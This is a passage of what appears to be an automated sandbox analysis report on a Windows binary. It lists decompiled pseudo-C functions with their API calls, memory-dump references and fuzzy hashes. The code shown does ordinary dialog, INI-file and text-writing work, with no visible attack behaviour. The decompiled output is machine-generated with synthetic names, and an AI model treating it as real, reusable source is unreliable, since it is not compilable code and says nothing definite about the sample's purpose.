                                                                                                                                                      					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                                                      				}
                                                                                                                                                      				return _t37;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040D614
                                                                                                                                                        • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
                                                                                                                                                        • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
                                                                                                                                                      • memset.MSVCRT ref: 0040D647
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 0040D669
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                      • Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                      • Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
                                                                                                                                                      • Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                      • Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				void _v48;
                                                                                                                                                      				void* _v52;
                                                                                                                                                      				int _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				signed int _v80;
                                                                                                                                                      				int _v92;
                                                                                                                                                      				void _v96;
                                                                                                                                                      				void* _v100;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      
                                                                                                                                                      				memset( &_v96, 0, 0x2c);
                                                                                                                                                      				_v100 = _a12;
                                                                                                                                                      				_v80 = _a16;
                                                                                                                                                      				_v72 = _a20;
                                                                                                                                                      				_v96 = 0;
                                                                                                                                                      				_v92 = 0;
                                                                                                                                                      				_v68 = 0;
                                                                                                                                                      				memset( &_v48, 0, 0x2c);
                                                                                                                                                      				_v52 = 4;
                                                                                                                                                      				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
                                                                                                                                                      					_t34 = _v32 & 0x00000003;
                                                                                                                                                      					if(_t34 != 0) {
                                                                                                                                                      						_v80 = _v80 & 0xfffffffc | _t34;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 568519121-0
                                                                                                                                                      • Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                      • Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
                                                                                                                                                      • Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                      • Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 47%
                                                                                                                                                      			E0040A3BF(void* __esi) {
                                                                                                                                                      				void* _v516;
                                                                                                                                                      				long _v1028;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				wchar_t* _t15;
                                                                                                                                                      				signed short _t23;
                                                                                                                                                      				signed short _t25;
                                                                                                                                                      				void* _t29;
                                                                                                                                                      
                                                                                                                                                      				_t29 = __esi;
                                                                                                                                                      				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
                                                                                                                                                      				_t23 = 4;
                                                                                                                                                      				_push(E00406827(_t23));
                                                                                                                                                      				_push(0xff);
                                                                                                                                                      				_push( &_v516);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
                                                                                                                                                      				if(_t15 > 0) {
                                                                                                                                                      					_push(_t15);
                                                                                                                                                      					_t25 = 5;
                                                                                                                                                      					_push(E00406827(_t25));
                                                                                                                                                      					_push(0xff);
                                                                                                                                                      					_push( &_v1028);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t15 = wcscat( &_v516,  &_v1028);
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
                                                                                                                                                      					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A3EC
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A417
                                                                                                                                                      • wcscat.MSVCRT ref: 0040A42A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                      • Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                      • Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
                                                                                                                                                      • Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                      • Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				long _v12;
                                                                                                                                                      				long _t13;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                      
                                                                                                                                                      				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                                                      				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                                                      				_v12 = _t13;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if(_t13 <= 0) {
                                                                                                                                                      					L3:
                                                                                                                                                      					_t14 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      						if(_v8 < _v12) {
                                                                                                                                                      							continue;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L3;
                                                                                                                                                      						}
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                                                      					_t14 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				L4:
                                                                                                                                                      				return _t14;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 00405779
                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                      • Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                      • Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
                                                                                                                                                      • Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                      • Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				intOrPtr* _t49;
                                                                                                                                                      
                                                                                                                                                      				_t40 = __edx;
                                                                                                                                                      				_push(__ebx);
                                                                                                                                                      				_t47 = __ecx;
                                                                                                                                                      				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
                                                                                                                                                      				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
                                                                                                                                                      				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
                                                                                                                                                      				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
                                                                                                                                                      				E00405700(_t16, E00406827(0x3b7), 1);
                                                                                                                                                      				E00405700(_t16, E00406827(0x3b8), 2);
                                                                                                                                                      				E0040300B(_t47);
                                                                                                                                                      				_t36 = _t47;
                                                                                                                                                      				_pop(_t48);
                                                                                                                                                      				_t49 = _t36;
                                                                                                                                                      				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
                                                                                                                                                      				 *((intOrPtr*)( *_t49 + 0x1c))();
                                                                                                                                                      				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
                                                                                                                                                      				return 0;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FAC
                                                                                                                                                        • Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                        • Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                        • Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FBF
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00402FC2
                                                                                                                                                      • GetDlgItem.USER32 ref: 00402FCC
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                        • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2946568780-0
                                                                                                                                                      • Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                      • Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
                                                                                                                                                      • Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                      • Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void _v32775;
                                                                                                                                                      				char _v32776;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x8004, __ecx);
                                                                                                                                                      				_v32776 = 0;
                                                                                                                                                      				memset( &_v32775, 0, 0x7fff);
                                                                                                                                                      				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
                                                                                                                                                      				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004087A2
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
                                                                                                                                                      • strlen.MSVCRT ref: 004087D1
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                      • Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
                                                                                                                                                      • Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                      • Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void _v8199;
                                                                                                                                                      				char _v8200;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2004, __ecx);
                                                                                                                                                      				_v8200 = 0;
                                                                                                                                                      				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                      				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00408811
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
                                                                                                                                                      • strlen.MSVCRT ref: 0040883C
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                      • Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
                                                                                                                                                      • Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                      • Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 19%
                                                                                                                                                      			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t26 = __edx;
                                                                                                                                                      				_t11 = _a4 - 0x110;
                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                      					E0040D12C(__ecx, __ecx, __eflags);
                                                                                                                                                      					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
                                                                                                                                                      					L5:
                                                                                                                                                      					return E004015CE(_t27, _a4, _a8, _a12);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t11 != 0x28 || E00405954(_a12) == 0) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				} else {
                                                                                                                                                      					SetBkMode(_a8, 1);
                                                                                                                                                      					SetBkColor(_a8, 0xffffff);
                                                                                                                                                      					SetTextColor(_a8, 0xc00000);
                                                                                                                                                      					return GetStockObject(0);
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405954: memset.MSVCRT ref: 00405973
                                                                                                                                                        • Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
                                                                                                                                                        • Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040D4CC
                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 0040D4F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                      • Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                      • Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
                                                                                                                                                      • Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                      • Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401482() {
                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                      				struct HWND__* _t17;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      
                                                                                                                                                      				if( *0x412394 == 2) {
                                                                                                                                                      					ExitProcess(1);
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                                                                                      				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                                      				if( *(_t26 + 0xc) == 0x110) {
                                                                                                                                                      					_t17 =  *(_t25 + 0x10);
                                                                                                                                                      					 *(_t26 + 0xc) = _t17;
                                                                                                                                                      					if( *0x412ecc != 0) {
                                                                                                                                                      						EnumChildWindows(_t17, E00406B34, 2);
                                                                                                                                                      						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
                                                                                                                                                      						E00405D0F( *(_t26 + 0xc), 0x400000);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(_t25 + 8)) != 0) {
                                                                                                                                                      					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
                                                                                                                                                      				}
                                                                                                                                                      				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
                                                                                                                                                      				return E0040E2F1(_t14);
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChildEnumWindows$ExitLongProcessWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2626381504-0
                                                                                                                                                      • Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                      • Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
                                                                                                                                                      • Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                      • Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C3B4(void** __eax, struct HWND__* _a4) {
                                                                                                                                                      				int _t7;
                                                                                                                                                      				void** _t11;
                                                                                                                                                      
                                                                                                                                                      				_t11 = __eax;
                                                                                                                                                      				if( *0x413258 == 0) {
                                                                                                                                                      					memcpy(0x412668,  *__eax, 0x50);
                                                                                                                                                      					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
                                                                                                                                                      					 *0x413258 = 1;
                                                                                                                                                      					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
                                                                                                                                                      					 *0x413258 =  *0x413258 & 0x00000000;
                                                                                                                                                      					 *0x412394 = _t7;
                                                                                                                                                      					return 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                      • Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                      • Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
                                                                                                                                                      • Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                      • Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				struct HWND__* _t11;
                                                                                                                                                      				struct HWND__* _t12;
